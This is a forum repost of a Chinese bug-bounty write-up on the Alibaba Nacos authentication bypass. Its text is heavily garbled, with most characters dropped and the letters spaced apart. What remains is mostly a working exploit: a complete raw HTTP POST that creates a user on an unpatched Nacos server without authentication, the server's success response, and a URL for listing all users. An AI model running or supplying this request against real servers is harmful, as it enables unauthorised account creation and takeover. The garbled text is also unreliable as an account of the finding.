搜索

[7520] 2021-02-26_某企业SRC的AlibabaNacos认证绕过漏洞实战

文档创建者:s7ckTeam
浏览次数:29
最后更新:2025-01-17
2021-02-26_某企业SRC的AlibabaNacos认证绕过漏洞实战 S R C A l i b a b a   N a c o s       F 1 2 s e c   2 0 2 1 - 0 2 - 2 6   #   , 2 8 n a c o s n a c o s 访 h t t p , 使 c o n s o l e 访 h t t p s : / / j a v a z h i y i n . b l o g . c s d n . n e t / a r t i c l e / d e t a i l s / 1 1 2 7 9 1 4 8 1   N a c o s   N a c o s   < =   2 . 0 . 0 - A L P H A . 1 N a c o s     <   1 . 4 . 1 S R C A l i b a b a   N a c o s p o s t t e s t t e s t 0 x 0 0 0 x 0 1 0 x 0 2 0 x 0 3 S R C / n a c o s / v 1 / a u t h / u s e r s ? u s e r n a m e = t e s t & p a s s w o r d = t e s t P O S T   / n a c o s / v 1 / a u t h / u s e r s ? u s e r n a m e = t e s t & p a s s w o r d = t e s t   H T T P / 1 . 1 H o s t :   x x x x x x . c o m U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 ;   r v : 8 5 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 8 5 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 , z h - T W ; q = 0 . 7 , z h - H K ; q = 0 . 5 , e n - U S ; q = 0 . 3 , e n ; q = 0 . 2 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e C o n n e c t i o n :   c l o s e U p g r a d e - I n s e c u r e - R e q u e s t s :   1 X - F o r w a r d e d - F o r :   1 2 7 . 0 . 0 . 1 C a c h e - C o n t r o l :   m a x - a g e = 0 C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   0
访 t e s t 访 {         " c o d e " : 2 0 0 ,         " m e s s a g e " : " c r e a t e   u s e r   o k ! " ,         " d a t a " : n u l l } / n a c o s / v 1 / a u t h / u s e r s ? p a g e N o = 1 & p a g e S i z e = 9 9 9 h t t p : / / x x x x x x . c o m / n a c o s / v 1 / a u t h / u s e r s ? p a g e N o = 1 & p a g e S i z e = 9 9 9 h t t p : / / x x x x x x . c o m / n a c o s / # / l o g i n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理